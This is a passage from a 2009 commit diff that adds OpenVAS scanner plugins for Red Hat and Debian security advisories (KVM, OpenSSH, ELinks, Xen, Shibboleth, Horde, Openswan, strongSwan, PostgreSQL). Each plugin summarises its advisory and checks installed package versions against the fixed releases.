script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1465"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1465. + +KVM (Kernel-based Virtual Machine) is a full virtualization solution for +Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for +the standard Red Hat Enterprise Linux kernel. + +The kvm_emulate_hypercall() implementation was missing a check for the +Current Privilege Level (CPL). A local, unprivileged user in a virtual +machine could use this flaw to cause a local denial of service or escalate +their privileges within that virtual machine. (CVE-2009-3290) + +All KVM users should upgrade to these updated packages, which contain +backported patches to resolve these issues. Note: The procedure in the +Solution section must be performed before this update takes effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1465.html +http://www.redhat.com/security/updates/classification/#important + +Risk factor : High"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1465"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"kmod-kvm", rpm:"kmod-kvm~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm", rpm:"kvm~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-debuginfo", rpm:"kvm-debuginfo~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-qemu-img", rpm:"kvm-qemu-img~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"kvm-tools", rpm:"kvm-tools~83~105.el5_4.7", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1470.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,103 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1470 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64992); + script_cve_id("CVE-2009-2904"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1470"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1470. + +OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These +packages include the core files necessary for both the OpenSSH client and +server. + +A Red Hat specific patch used in the openssh packages as shipped in Red +Hat Enterprise Linux 5.4 (RHSA-2009:1287) loosened certain ownership +requirements for directories used as arguments for the ChrootDirectory +configuration options. A malicious user that also has or previously had +non-chroot shell access to a system could possibly use this flaw to +escalate their privileges and run commands as any system user. +(CVE-2009-2904) + +All OpenSSH users are advised to upgrade to these updated packages, which +contain a backported patch to resolve this issue. After installing this +update, the OpenSSH server daemon (sshd) will be restarted automatically. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1470.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1470"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"openssh", rpm:"openssh~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-askpass", rpm:"openssh-askpass~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-clients", rpm:"openssh-clients~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-debuginfo", rpm:"openssh-debuginfo~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"openssh-server", rpm:"openssh-server~4.3p2~36.el5_4.2", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1471.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,103 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1471 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64993); + script_cve_id("CVE-2007-2027", "CVE-2008-7224"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1471"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1471. + +ELinks is a text-based Web browser. ELinks does not display any images, but +it does support frames, tables, and most other HTML tags. + +An off-by-one buffer overflow flaw was discovered in the way ELinks handled +its internal cache of string representations for HTML special entities. A +remote attacker could use this flaw to create a specially-crafted HTML file +that would cause ELinks to crash or, possibly, execute arbitrary code when +rendered. (CVE-2008-7224) + +It was discovered that ELinks tried to load translation files using +relative paths. A local attacker able to trick a victim into running ELinks +in a folder containing specially-crafted translation files could use this +flaw to confuse the victim via incorrect translations, or cause ELinks to +crash and possibly execute arbitrary code via embedded formatting sequences +in translated messages. (CVE-2007-2027) + +All ELinks users are advised to upgrade to this updated package, which +contains backported patches to resolve these issues. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1471.html +http://www.redhat.com/security/updates/classification/#important + +Risk factor : High"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1471"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"elinks", rpm:"elinks~0.9.2~4.el4_8.1", rls:"RHENT_4")) { + vuln = 1; +} +if(isrpmvuln(pkg:"elinks-debuginfo", rpm:"elinks-debuginfo~0.9.2~4.el4_8.1", rls:"RHENT_4")) { + vuln = 1; +} +if(isrpmvuln(pkg:"elinks", rpm:"elinks~0.11.1~6.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"elinks-debuginfo", rpm:"elinks-debuginfo~0.11.1~6.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl =================================================================== --- trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/RHSA_2009_1472.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,122 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory RHSA-2009:1472 () +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(64994); + script_cve_id("CVE-2009-3525"); + script_version ("$"); + script_name("RedHat Security Advisory RHSA-2009:1472"); + + desc = " +The remote host is missing updates announced in +advisory RHSA-2009:1472. + +Xen is an open source virtualization framework. Virtualization allows users +to run guest operating systems in virtual machines on top of a host +operating system. + +The pyGrub boot loader did not honor the password option in the grub.conf +file for para-virtualized guests. Users with access to a guest's console +could use this flaw to bypass intended access restrictions and boot the +guest with arbitrary kernel boot options, allowing them to get root +privileges in the guest's operating system. With this update, pyGrub +correctly honors the password option in grub.conf for para-virtualized +guests. (CVE-2009-3525) + +This update also fixes the following bugs: + +* rebooting para-virtualized guests sometimes caused those guests to crash +due to a race condition in the xend node control daemon. This update fixes +this race condition so that rebooting guests no longer potentially causes +them to crash and fail to reboot. (BZ#525141) + +* due to a race condition in the xend daemon, a guest could disappear from +the list of running guests following a reboot, even though the guest +rebooted successfully and was running. This update fixes this race +condition so that guests always reappear in the guest list following a +reboot. (BZ#525143) + +* attempting to use PCI pass-through to para-virtualized guests on certain +kernels failed with a Function not implemented error message. As a +result, users requiring PCI pass-through on para-virtualized guests were +not able to update the xen packages without also updating the kernel and +thus requiring a reboot. These updated packages enable PCI pass-through for +para-virtualized guests so that users do not need to upgrade the kernel in +order to take advantage of PCI pass-through functionality. (BZ#525149) + +All Xen users should upgrade to these updated packages, which contain +backported patches to correct these issues. After installing the updated +packages, the xend service must be restarted for this update to take +effect. + +Solution: +Please note that this update is available via +Red Hat Network. To use Red Hat Network, launch the Red +Hat Update Agent with the following command: up2date + +http://rhn.redhat.com/errata/RHSA-2009-1472.html +http://www.redhat.com/security/updates/classification/#moderate + +Risk factor : Medium"; + + script_description(desc); + + script_summary("Redhat Security Advisory RHSA-2009:1472"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/rpms"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-rpm.inc"); +vuln = 0; +if(isrpmvuln(pkg:"xen-debuginfo", rpm:"xen-debuginfo~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen-libs", rpm:"xen-libs~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen", rpm:"xen~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} +if(isrpmvuln(pkg:"xen-devel", rpm:"xen-devel~3.0.3~94.el5_4.1", rls:"RHENT_5")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1896_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1896_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1896_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,136 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1896-1 (opensaml, shibboleth-sp) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65003); + script_version ("$"); + script_name("Debian Security Advisory DSA 1896-1 (opensaml, shibboleth-sp)"); + + desc = " +The remote host is missing an update to opensaml, shibboleth-sp +announced via advisory DSA 1896-1. + +Several vulnerabilities have been discovered in the opensaml and +shibboleth-sp packages, as used by Shibboleth 1.x: + +Chris Ries discovered that decoding a crafted URL leads to a crash +(and potentially, arbitrary code execution). + +Ian Young discovered that embedded NUL characters in certificate names +were not correctly handled, exposing configurations using PKIX trust +validation to impersonation attacks. + +Incorrect processing of SAML metadata ignored key usage constraints. + +For the old stable distribution (etch), these problems have been fixed +in version 1.3f.dfsg1-2+etch1 of the shibboleth-sp packages, and +version 1.1a-2+etch1 of the opensaml packages. + +For the stable distribution (lenny), these problems have been fixed in +version 1.3.1.dfsg1-3+lenny1 of the shibboleth-sp packages, and +version 1.1.1-2+lenny1 of the opensaml packages. + +The unstable distribution (sid) does not contain Shibboleth 1.x +packages. + +This update requires restarting the affected services (mainly Apache) +to become effective. + +We recommend that you upgrade your Shibboleth 1.x packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201896-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1896-1 (opensaml, shibboleth-sp)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"opensaml-schemas", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libapache2-mod-shib", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib6", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml-dev", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-dev", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml5", ver:"1.1a-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-target5", ver:"1.3f.dfsg1-2+etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"opensaml-schemas", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-dev", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml5", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libapache2-mod-shib", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib6", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libsaml-dev", ver:"1.1.1-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"libshib-target5", ver:"1.3.1.dfsg1-3+lenny1", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1897_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1897_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1897_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,98 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1897-1 (horde3) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65002); + script_cve_id("CVE-2009-3236"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1897-1 (horde3)"); + + desc = " +The remote host is missing an update to horde3 +announced via advisory DSA 1897-1. + +Stefan Esser discovered that Horde, a web application framework providing +classes for dealing with preferences, compression, browser detection, +connection tracking, MIME, and more, is insufficiently validating and +escaping user provided input. The Horde_Form_Type_image form element +allows to reuse a temporary filename on reuploads which are stored in a +hidden HTML field and then trusted without prior validation. An attacker +can use this to overwrite arbitrary files on the system or to upload PHP +code and thus execute arbitrary code with the rights of the webserver. + + +For the oldstable distribution (etch), this problem has been fixed in +version 3.1.3-4etch6. + +For the stable distribution (lenny), this problem has been fixed in +version 3.2.2+debian0-2+lenny1. + +For the testing distribution (squeeze), this problem has been fixed in +version 3.3.5+debian0-1. + +For the unstable distribution (sid), this problem has been fixed in +version 3.3.5+debian0-1. + + +We recommend that you upgrade your horde3 packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201897-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1897-1 (horde3)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"horde3", ver:"3.1.3-4etch6", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"horde3", ver:"3.2.2+debian0-2+lenny1", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1898_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1898_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1898_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,100 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1898-1 (openswan) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65004); + script_cve_id("CVE-2009-2185"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1898-1 (openswan)"); + + desc = " +The remote host is missing an update to openswan +announced via advisory DSA 1898-1. + +It was discovered that the pluto daemon in the openswan, an +implementation of IPSEC and IKE, could crash when processing a crafted +X.509 certificate. + +For the old stable distribution (etch), this problem has been fixed in +version 2.4.6+dfsg.2-1.1+etch2. + +For the stable distribution (lenny), this problem has been fixed in +version 2.4.12+dfsg-1.3+lenny2. + +For the unstable distribution (sid), this problem has been fixed in +version 2.6.22+dfsg-1. + +We recommend that you upgrade your openswan package. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201898-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1898-1 (openswan)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"openswan-modules-source", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"linux-patch-openswan", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan", ver:"2.4.6+dfsg.2-1.1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"linux-patch-openswan", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan-modules-source", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"openswan", ver:"2.4.12+dfsg-1.3+lenny2", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1899_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1899_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1899_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,102 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1899-1 (strongswan) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65006); + script_cve_id("CVE-2009-1957", "CVE-2009-1958", "CVE-2009-2185", "CVE-2009-2661"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1899-1 (strongswan)"); + + desc = " +The remote host is missing an update to strongswan +announced via advisory DSA 1899-1. + +Several remote vulnerabilities have been discovered in strongswan, an +implementation of the IPSEC and IKE protocols. The Common +Vulnerabilities and Exposures project identifies the following +problems: + +CVE-2009-1957 +CVE-2009-1958 + +The charon daemon can crash when processing certain crafted IKEv2 +packets. (The old stable distribution (etch) was not affected by +these two problems because it lacks IKEv2 support.) + +CVE-2009-2185 +CVE-2009-2661 + +The pluto daemon could crash when processing a crafted X.509 +certificate. + +For the old stable distribution (etch), these problems have been fixed +in version 2.8.0+dfsg-1+etch2. + +For the stable distribution (lenny), these problems have been fixed in +version 4.2.4-5+lenny3. + +For the unstable distribution (sid), these problems have been fixed in +version 4.3.2-1.1. + +We recommend that you upgrade your strongswan packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201899-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1899-1 (strongswan)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"strongswan", ver:"2.8.0+dfsg-1+etch2", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"strongswan", ver:"4.2.4-5+lenny3", rls:"DEB5.0")) { + vuln = 1; +} + +if(vuln) { + security_hole(0); +} Added: trunk/openvas-plugins/scripts/deb_1900_1.nasl =================================================================== --- trunk/openvas-plugins/scripts/deb_1900_1.nasl 2009-10-05 21:54:23 UTC (rev 5377) +++ trunk/openvas-plugins/scripts/deb_1900_1.nasl 2009-10-06 00:49:40 UTC (rev 5378) @@ -0,0 +1,226 @@ +# OpenVAS Vulnerability Test +# $Id$ +# Description: Auto-generated from advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4) +# +# Authors: +# Thomas Reinke +# +# Copyright: +# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com +# Text descriptions are largely excerpted from the referenced +# advisory, and are Copyright (c) the respective author(s) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2, +# or at your option, GNU General Public License version 3, +# as published by the Free Software Foundation +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +# + +if(description) +{ + script_id(65005); + script_cve_id("CVE-2009-3229", "CVE-2009-3230", "CVE-2009-3231"); + script_version ("$"); + script_name("Debian Security Advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4)"); + + desc = " +The remote host is missing an update to postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4 +announced via advisory DSA 1900-1. + +Several vulnerabilities have been discovered in PostgreSQL, an SQL +database system. The Common Vulnerabilities and Exposures project +identifies the following problems: + +CVE-2009-3229 + +Authenticated users can shut down the backend server by re-LOAD-ing +libraries in $libdir/plugins, if any libraries are present there. +(The old stable distribution (etch) is not affected by this issue.) + +CVE-2009-3230 + +Authenticated non-superusers can gain database superuser privileges if +they can create functions and tables due to incorrect execution of +functions in functional indexes. + +CVE-2009-3231 + +If PostgreSQL is configured with LDAP authentication, and the LDAP +configuration allows anonymous binds, it is possible for a user to +authenticate themselves with an empty password. (The old stable +distribution (etch) is not affected by this issue.) + +In addition, this update contains reliability improvements which do +not target security issues. + +For the old stable distribution (etch), these problems have been fixed +in version 7.4.26-0etch1 of the postgresql-7.4 source package, and +version 8.1.18-0etch1 of the postgresql-8.1 source package. + +For the stable distribution (lenny), these problems have been fixed in +version 8.3.8-0lenny1 of the postgresql-8.3 source package. + +For the unstable distribution (sid), these problems have been fixed in +version 8.3.8-1 of the postgresql-8.3 source package, and version +8.4.1-1 of the postgresql-8.4 source package. + +We recommend that you upgrade your PostgreSQL packages. + +Solution: +https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201900-1 + +Risk factor : High"; + + script_description(desc); + + script_summary("Debian Security Advisory DSA 1900-1 (postgresql-7.4, postgresql-8.1, postgresql-8.3, postgresql-8.4)"); + + script_category(ACT_GATHER_INFO); + + script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com"); + script_family("Debian Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/packages"); + exit(0); +} + +# +# The script code starts here +# + +include("revisions-lib.inc"); +include("pkg-lib-deb.inc"); +vuln = 0; +if(isdpkgvuln(pkg:"postgresql-server-dev-7.4", ver:"7.4.26-0etch1", rls:"DEB4.0")) { + vuln = 1; +} +if(isdpkgvuln(pkg:"postgresql-doc-8.1", 